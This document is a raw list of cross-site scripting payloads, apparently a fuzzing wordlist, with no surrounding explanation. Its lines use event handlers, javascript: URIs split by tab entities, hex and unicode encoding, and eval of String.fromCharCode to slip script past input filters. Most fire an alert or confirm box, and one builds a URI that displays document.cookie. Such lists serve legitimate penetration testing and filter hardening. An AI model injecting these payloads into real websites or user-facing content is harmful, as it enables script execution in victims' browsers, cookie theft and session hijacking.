"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<body onload=alert(1)>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<--<img/src=%20onerror=confirm``>%20--!>
<img/src=x onError="`${x}`;alert(`Hello`);">
<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>
<script>//**/alert(1)//->/</script>
<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>
<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>
<script>eval(String.fromCharCode(//97//,//108//,//101//,//114//,//116//,//40//,//49//,//41//))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>
<scr&#x9Cipt>alert(1)</scr&#x9Cipt>
<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>
<sVg/onLy=1 onLoaD=confirm(1)//
